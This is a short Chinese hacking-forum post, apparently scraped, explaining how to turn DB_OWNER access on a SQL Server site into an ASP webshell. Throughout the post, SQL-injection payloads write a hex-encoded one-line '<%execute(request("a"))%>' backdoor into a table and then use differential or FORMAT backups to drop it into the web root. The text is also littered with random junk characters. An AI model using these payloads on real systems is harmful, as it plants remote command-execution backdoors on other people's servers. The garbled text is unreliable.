DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
6 j% ?1 f  Y: A6 e$ }
减少备份文件大小，得到可执行的webshell成功率提高不少
% d$ j2 V* R9 a& P  `3 R# s5 _# i一利用差异备份
- q8 Q, x1 k; U1 ~; J( D5 W* }加一个参数WITH DIFFERENTIAL

% G+ S5 m' a- H1 p1
2
* z/ L! x1 w* `" |9 q2 s2 Q2 K3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& u( |7 i0 E3 w& o5 Kcreate table [dbo].[xiaolu] ([cmd] [image]);
- Y; \$ ]3 z8 f1 d, {' iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 D: ?* e7 o% R/ @! @! ^. vdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

% c; ~" T- s9 P" f9 \, @二利用完全FORMAT
0 D9 M" Q* B& a% G* X" U3 j加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
2
: h5 h7 K% d  J; O3
0 x* S5 l) T5 R  [6 J7 z: C4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  l  M0 v6 ?' M/ ~( bcreate table [dbo].[xiaolu] ([cmd] [image]);
3 I, L% c5 B: Linsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" E" y8 ^1 P6 G! d7 U; S4 edeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
6 }/ z: h9 ?6 b4 c& [5 i; H) [- K
总的来说就是那么简单几句,下面以备份数据库model为例子
# l8 j* `9 e) P! k' I" a3 q  i; C1
: U9 i# W! m5 U8 p& H
1
* e  k0 E( c2 d& y. B$ f id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

6 Y: m. C) P% t) U/ z2

1
) B+ ?% o9 ~6 b* I: F- X. @  a id=1;backup database model to disk='你的路径‘ with differential,format;--